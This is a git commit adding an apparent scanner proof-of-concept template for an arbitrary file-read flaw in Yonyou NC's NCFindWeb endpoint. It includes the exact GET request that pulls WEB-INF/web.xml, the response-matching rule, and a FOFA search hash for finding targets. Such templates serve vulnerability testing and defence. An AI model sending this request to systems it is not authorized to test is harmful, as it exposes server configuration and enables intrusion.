feat: add curated internal network pocs

This commit is contained in:
ZacharyZcR
2026-07-16 01:45:09 +08:00
parent 61ae87d171
commit 621b2c2f24
52 changed files with 1230 additions and 0 deletions
@@ -0,0 +1,22 @@
id: yonyou-ncfindweb-fileread
info:
name: 用友 NC NCFindWeb 任意文件读取漏洞
author: princechaddha
severity: high
verified: true
description: |
用友 NC NCFindWeb 任意文件读取漏洞
fofa: icon_hash="1085941792"
tags: yonyou,ncfindweb,fileread
created: 2023/05/26
rules:
r0:
request:
method: GET
path: /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
expression: |
response.status == 200 &&
response.body.bcontains(b'<web-app') && response.body.bcontains(b'</web-app>')
expression: r0()